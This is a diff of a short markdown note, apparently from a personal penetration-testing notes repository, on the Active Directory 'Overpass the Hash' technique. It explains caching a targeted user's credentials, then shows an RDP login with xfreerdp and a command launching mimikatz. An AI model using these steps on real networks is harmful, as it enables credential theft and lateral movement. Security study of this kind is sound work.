ThomasBucaioni/pentools/microsoft/adlateral.md

 ### Overpass the Hash

-First, run a process as a different user with Shift-Right click, say Notepad.
+First, run a process as a different user with Shift-Right click, say Notepad, to cache this targeted user credentials.
 Then:
 ```
 kali$ xfreerdp /cert-ignore /u:someuser /d:targetorg.com /p:somepass /v:somehostIp
 PS > c:\path\to\mimikatz.exe